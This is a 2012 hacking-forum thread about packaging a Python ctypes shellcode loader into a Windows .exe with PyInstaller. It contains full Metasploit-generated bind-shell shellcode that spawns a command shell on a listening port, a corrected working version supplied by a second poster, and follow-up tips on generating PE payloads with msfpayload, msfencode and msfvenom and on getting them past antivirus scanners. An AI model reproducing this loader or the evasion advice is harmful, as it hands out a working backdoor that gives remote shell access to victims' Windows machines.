Python/c Problem

bobbyb1980 · May 28, 2012

Hello hak5,

I am having an issue getting C shellcode to compile from within a python script. What I am trying to do is use pyinstaller to make an .exe out of a python script.

from ctypes import *


shellcode = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68"
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"

memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()

The above is the script I want to create a .exe out of. The shellcode is in C and it was generated via the following command and pasted into the script.

./msfpayload windows/shell_bind_tcp C

Now when I try to build an .exe out of it using pyinstaller, I issue the following:

$ python Configure.py
....
*completes successfully*

$ python Makespec.py --onefile --noconsole pyshell.py
wrote /home/pyinstaller-1.5.1/pyshell/pyshell.spec
now run Build.py to build the executable

$ python Build.py pyshell/pyshell.spec
checking Analysis
building Analysis because outAnalysis0.toc non existent
running Analysis outAnalysis0.toc
Analyzing: support/_mountzlib.py
Analyzing: support/useUnicode.py
Analyzing: pyshell.py
Traceback (most recent call last):
  File "Build.py", line 1494, in &lt;module&gt;
    main(args[0], configfilename=opts.configfile)
  File "Build.py", line 1472, in main
    build(specfile)
  File "Build.py", line 1429, in build
    execfile(spec)
  File "pyshell/pyshell.spec", line 3, in &lt;module&gt;
    pathex=['/home/pyth0n/Desktop/works_in_progress/pyinstaller/pyinstaller-1.5.1'])
  File "Build.py", line 347, in __init__
    self.__postinit__()
  File "Build.py", line 298, in __postinit__
    self.assemble()
  File "Build.py", line 416, in assemble
    analyzer.analyze_script(script)
  File "/home/pyth0n/Desktop/works_in_progress/pyinstaller/pyinstaller-1.5.1/mf.py", line 565, in analyze_script
    co = compile(string.replace(stuff, "\r\n", "\n"), fnm, 'exec')
ValueError: invalid \x escape

It appears that the script is being run and python is literally interpreting the /x as an escape and I want it to read it as a regular string without paying any mind to the contents. Presumably it will go onto to compile it and give me the .exe and it would be Windows ready.

Also tried playing with the syntax of the shellcode, removing the ' and " characters to no avail.

Anyone know what's going on here?

Edited May 28, 2012 by bobbyb1980

int0x80 · May 29, 2012

Try this:

shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68"
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")

bobbyb1980 · May 29, 2012

That did the trick int0x, thanks a lot for your help.

Edited May 29, 2012 by bobbyb1980

bobbyb1980 · May 29, 2012

Just out of curiosity int0x - does your payload actually work using this method? My payload for a windows/shell_reverse_tcp on port 2020 doesn't seem to want to work on a Windows XP box.

int0x80 · May 29, 2012

I usually use msfpayload and msfencode with -t exe for kicking out payloads in PE form.

You can also do -f exe with msfvenom, iirc (don't have my bt5 vm up at the moment).

Mr-Protocol · May 29, 2012

Tons of info here :P

http://www.offensive-security.com/metasploit-unleashed/Msfvenom

msfvenom is just msfpayload + msfencode in the same tool. I tend to use msfpayload and msfencode independently instead of msfvenom but I'd figure it wouldn't matter too much.

bobbyb1980 · May 30, 2012

I usually use msfpayload and msfencode with -t exe for kicking out payloads in PE form.

You can also do -f exe with msfvenom, iirc (don't have my bt5 vm up at the moment).

Thanks for the tip. You mean like piping msfpayload to msfencode (same thing in essence as msfvenom ie msfpayload multi/handler PAYLOAD=... | msfencode .... -o whatever.exe?) for an .exe? If I understand you right, I tried that but was being picked up on most anti virus scanners.

I also tried msfvenom with various iteration combos w/no luck. I think most of the av's are going to detect msfencoded data.

Currently trying to learn shellcoding and it can be a real brain twister. Doing these labs, http://projectshellcode.com/?q=node/12 .

int0x80 · May 30, 2012

Actually I've good success bypassing AV with metasploit. Shellcode isn't too hard. Have you played with the nasm shell in metasploit? Another easy way for messing with shellcode is to just load a regular program in in OllyDbg, scroll down to the NULLs at the end of the section, hit space, and start typing your assembly. The debugger will display the op codes in the column to the left of the instructions.

bobbyb1980 · May 30, 2012

Starting to see it's not so bad, pretty awesome too : )

Sign In

Python/c Problem

Recommended Posts

bobbyb1980

Link to comment

Share on other sites

int0x80

Link to comment

Share on other sites

bobbyb1980

Link to comment

Share on other sites

bobbyb1980

Link to comment

Share on other sites

int0x80

Link to comment

Share on other sites

Mr-Protocol

Link to comment

Share on other sites

bobbyb1980

Link to comment

Share on other sites

int0x80

Link to comment

Share on other sites

bobbyb1980

Link to comment

Share on other sites

Join the conversation

Recently Browsing 0 members

Browse

Activity